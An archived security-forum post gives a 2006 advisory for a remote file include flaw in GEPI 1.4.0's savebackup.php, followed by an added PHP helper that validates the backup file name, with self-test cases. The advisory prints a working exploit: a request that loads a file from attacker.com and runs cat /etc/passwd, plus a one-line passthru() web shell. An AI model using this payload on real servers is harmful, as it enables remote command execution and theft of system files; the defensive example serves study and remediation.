EvilOctal Security Team Technical Discussion Group's Archiver

pub!1c 2006-11-1 07:48

GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability

[code]
Package:- gepi 1.4.0
[url]http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz[/url]

impact:- highly critical ..System Access..
vulnerable code:-
    include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
[url]http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat[/url] /etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id



[/code]
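
The root cause quoted in the advisory above is `include()` applied directly to a request parameter. The following is an added example, not part of the original post and not GEPI's own code or fix: a hypothetical helper `resolve_backup_path()` that turns the `filename` parameter into a path inside a single backup directory or rejects it. The directory layout, the `.sql`/`.gz` naming and the sample file are assumptions constructed for the demonstration.

```php
<?php
// Added example: hypothetical helper, not GEPI's own code.
// Assumption: backups sit in one directory with plain names such as "backup_2006.sql".
function resolve_backup_path(string $requested, string $backupDir): ?string
{
    // Plain file name only: no URL scheme (http://, php://), no separators,
    // no ".." sequence, no null byte.
    if (!preg_match('/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*\.(sql|gz)\z/', $requested)) {
        return null;
    }
    $base = realpath($backupDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks; the result must still be inside $base.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Call site sketch for the download script:
//   $path = resolve_backup_path($_GET['filename'] ?? '', $backupDir);
//   if ($path === null) { http_response_code(400); exit; }
//   readfile($path);   // send the bytes; never include() request-controlled input

// Self-check with constructed inputs (run with the PHP CLI).
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'backup_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'backup_2006.sql', "-- constructed sample dump\n");

$cases = [
    'backup_2006.sql'              => true,   // legitimate backup name
    'http://attacker.com/test.txt' => false,  // value from the advisory's request
    '../../etc/passwd'             => false,  // traversal out of the directory
    'php://input'                  => false,  // stream wrapper
    'missing.sql'                  => false,  // well-formed name, no such file
];
foreach ($cases as $input => $expected) {
    $accepted = resolve_backup_path($input, $dir) !== null;
    printf("%-30s %-8s %s\n", $input, $accepted ? 'accepted' : 'rejected',
        $accepted === $expected ? 'ok' : 'MISMATCH');
}

unlink($dir . DIRECTORY_SEPARATOR . 'backup_2006.sql');
rmdir($dir);
```

As a second layer, keeping `allow_url_include = Off` in php.ini stops `include()` from fetching remote URLs even where such a call site is missed.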

© 1999-2008 EvilOctal Security Team